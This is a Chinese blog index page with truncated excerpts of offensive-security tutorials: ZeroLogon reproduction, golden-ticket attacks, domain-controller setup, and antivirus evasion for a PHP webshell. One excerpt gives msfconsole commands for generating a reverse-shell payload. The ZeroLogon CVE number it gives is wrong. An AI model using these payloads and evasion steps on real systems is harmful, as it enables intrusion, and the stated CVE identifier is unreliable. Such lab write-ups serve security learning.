会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
lisyr
博客园
首页
新随笔
联系
订阅
管理
Github
随笔 - 4
文章 - 0
评论 - 1
阅读 -
2657
2023年2月24日
zerologon复现
摘要: zerologon漏洞复现 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为
阅读全文
posted @ 2023-02-24 19:50 lisyr
阅读(2185)
评论(0)
推荐(0)
2023年2月7日
生成并利用黄金票据
摘要: 1.利用msf生成反弹shell msfconsole #打开msf use payload/windows/meterpreter/reverse_tcp #打开生成payload模板 set lhost #设置ip(攻击机接受ip) set lport #设置端口 generate -f exe
阅读全文
posted @ 2023-02-07 22:05 lisyr
阅读(241)
评论(0)
推荐(0)
2023年2月6日
安装域控成员服务器
摘要: 1.服务器管理器中打开角色,点击添加角色 2.安装active directory域服务,一直下一步到安装完成 3.在win+r输入dcpromo.exe,弹出安装向导 4.根据提示填写内容到安装完成 5.把ip改成静态ip,dns改成本机ip 6.成员机dns改成域控服务器ip 7.控制面板-系统
阅读全文
posted @ 2023-02-06 14:54 lisyr
阅读(160)
评论(0)
推荐(0)
2023年2月2日
静态免杀
摘要: 0x01一句话木马免杀 1.编写一句话木马 这里我使用的绕过方法是拼接函数名和全局变量绕过 2.分别用virustotal和d盾进行扫描,结果如下 3.把木马放到网站目录下,并用蚁剑链接数据 0x02rsa免杀 1.打开蚁剑,新建php编码器 2.在rsa配置中生成webshell! image 3
阅读全文
posted @ 2023-02-02 22:49 lisyr
阅读(71)
评论(0)
推荐(0)
公告
昵称:
lisyr
园龄:
2年4个月
粉丝:
2
关注:
1
+加关注
<
2025年6月
>
日
一
二
三
四
五
六
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
9
10
11
12
搜索
常用链接
我的随笔
我的评论
我的参与
最新评论
我的标签
随笔档案
2023年2月(4)
阅读排行榜
1. zerologon复现(2185)
2. 生成并利用黄金票据(241)
3. 安装域控成员服务器(160)
4. 静态免杀(71)
点击右上角即可分享
深色
回顶
展开